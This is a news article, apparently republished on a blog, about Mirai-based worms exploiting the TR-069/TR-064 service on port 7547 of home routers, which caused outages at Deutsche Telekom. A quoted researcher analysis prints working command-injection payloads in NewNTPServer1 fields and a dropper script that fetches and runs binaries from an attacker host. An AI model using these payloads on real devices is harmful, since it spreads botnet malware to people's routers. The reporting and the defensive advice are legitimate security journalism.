Newly discovered router flaw being hammered by in-the-wild attacks

Online criminals—at least some of them wielding the notorious Mirai
malware that transforms Internet-of-things devices into powerful
denial-of-service cannons—have begun exploiting a critical flaw that may
be present in millions of home routers.
Routers provided to German and Irish ISP
customers for Deutsche Telekom and Eircom, respectively, have already
been identified as being vulnerable, according to recently published
reports from researchers tracking the attacks. The attacks exploit
weaknesses found in routers made by Zyxel, Speedport, and possibly other
manufacturers. The devices leave Internet port 7547 open to outside
connections. The exploits use the opening to send commands based on the TR-069 and related TR-064 protocols, which ISPs use to remotely manage large fleets of hardware. According to this advisory published Monday morning
by the SANS Internet Storm Center, honeypot servers posing as
vulnerable routers are receiving exploits every five to 10 minutes.
SANS Dean of Research Johannes Ullrich said in
Monday's post that exploits are almost certainly the cause behind an
outage that hit Deutsche Telekom customers over the weekend. In a Facebook update,
officials with the German ISP said 900,000 customers are vulnerable to
the attacks until they are rebooted and receive an emergency patch.
Earlier this month, researchers at security firm BadCyber reported that
the same one-two port 7547/TR-064 exploit hit the home router of a
reader in Poland. They went on to identify D1000 routers supplied by
Eircom as also being susceptible and cited this post
as support. The Shodan search engine shows that 41 million devices
leave port 7547 open, while about five million expose TR-064 services to
the outside world.
The attacks started shortly after researchers published attack code that exploited the exposed TR-064 service.
Included as a module for the Metasploit exploitation framework, the
attack code opens the port 80 Web interface that enables remote
administration. From there, devices that use default or otherwise weak
authentication passwords can be remotely commandeered and made to join botnets that carry out Internet-crippling denial-of-service attacks.
BadCyber researchers analyzed one of the
malicious payloads that was delivered during the attacks and found it
originated from a known Mirai command-and-control server.
"The unusual application of TR-064 commands to
execute code on routers has been described for the very first time at
the beginning of November, and a few days later a relevant Metasploit
module had appeared," BadCyber researchers wrote in a blog post. "It looks like someone decided to weaponize it and create an Internet worm based on Mirai code."
All bases covered
To infect as many routers as possible, the
exploits deliver three separate exploit files, two tailored to devices
running different types of MIPS chips and a third that targets routers
with ARM silicon. Just like the Metasploit code, the malicious payloads
use the exploit to open the remote administration interface and then
attempt to log in using three different default passwords. The attack
then closes port 7547 to prevent other criminal enterprises from taking
control of the devices. The researchers wrote:
Logins and passwords are obfuscated (or “encrypted”) in the worm code using the same algorithm as does Mirai. The C&C server resides under timeserver.host domain name, which can be found on the Mirai tracker list. Also the pseudorandom algorithm to scan IPs... looks like [it is] copied from Mirai source code. It looks like the author of the malware borrowed the Mirai code and mixed it with the Metasploit module to produce his worm.The malware itself is really friendly as it closes the vulnerability once the router is infected. It performs the following command:busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP busybox killall -9 telnetdwhich should make the device “secure”... until next reboot. The first one closes port 7547 and the second one kills the telnet service, making it really hard for the ISP to update the device remotely.Today we have seen new attack variants, namelycd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh <NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>In one of them the download method is changed from wget to tftp, while the other one changes binary download to a script. The script x.sh has the following contents:#!/bin/sh # https://www.instagram.com/p/bxI-TSk3p_/ cd /var/tmp cd /tmp rm -f * wget http://l.ocalhost.host/1 busybox chmod a+x 1 chmod 777 1 ./1 rm -f * wget http://l.ocalhost.host/2 busybox chmod a+x 2 chmod 777 2 ./2 rm -f * wget http://l.ocalhost.host/3 busybox chmod a+x 3 chmod 777 3 ./3 rm -f * wget http://l.ocalhost.host/4 busybox chmod a+x 4 chmod 777 4 ./4 rm -f * wget http://l.ocalhost.host/5 busybox chmod a+x 5 chmod 777 5 ./5 rm -f * wget http://l.ocalhost.host/6 busybox chmod a+x 6 chmod 777 6 ./6 rm -f * wget http://l.ocalhost.host/7 busybox chmod a+x 7 chmod 777 7 ./7 rm -f *Looks like the attacker wants some really wide coverage:1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped 2: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped 3: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped 4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped 5: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped 6: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped 7: ELF 32-bit MSB executable, Motorola 68020, version 1 (SYSV), statically linked, stripped
According to researchers at security firm
Kaspersky, the command-and-control servers are, interestingly, pointing
to IP addresses assigned to the US military.
"Since there is no Mirai related
infrastructure behind this network range, the bots will not receive any
further commands until the criminals behind this attack will change the
DNS records again," Kaspersky researchers wrote in a blog post published around the same time this article went live. "For sure, this is some kind of trolling from the criminals who conducted the attack."
The TR-069 exploit is at least the second major update that Mirai has received since its source code was made public in October. Additional technical details about the vulnerability are available here, here, and here.
People who want to lock down their routers and
have the necessary technical skills should reboot them and immediately
check to see if the devices are listening for incoming commands on port
7547. As mentioned above, most Mirai-infected devices will be locked
down and will display few indications of compromise, although frequent
reboots have been reported in a least some cases. Generally speaking,
IoT devices are disinfected each time they're restarted. A good practice
is to reboot them and immediately lock them down with a strong
password, or, better yet, to disable remote administration.
Newly discovered router flaw being hammered by in-the-wild attacks
Reviewed by Bizpodia
on
00:41
Rating:
No comments: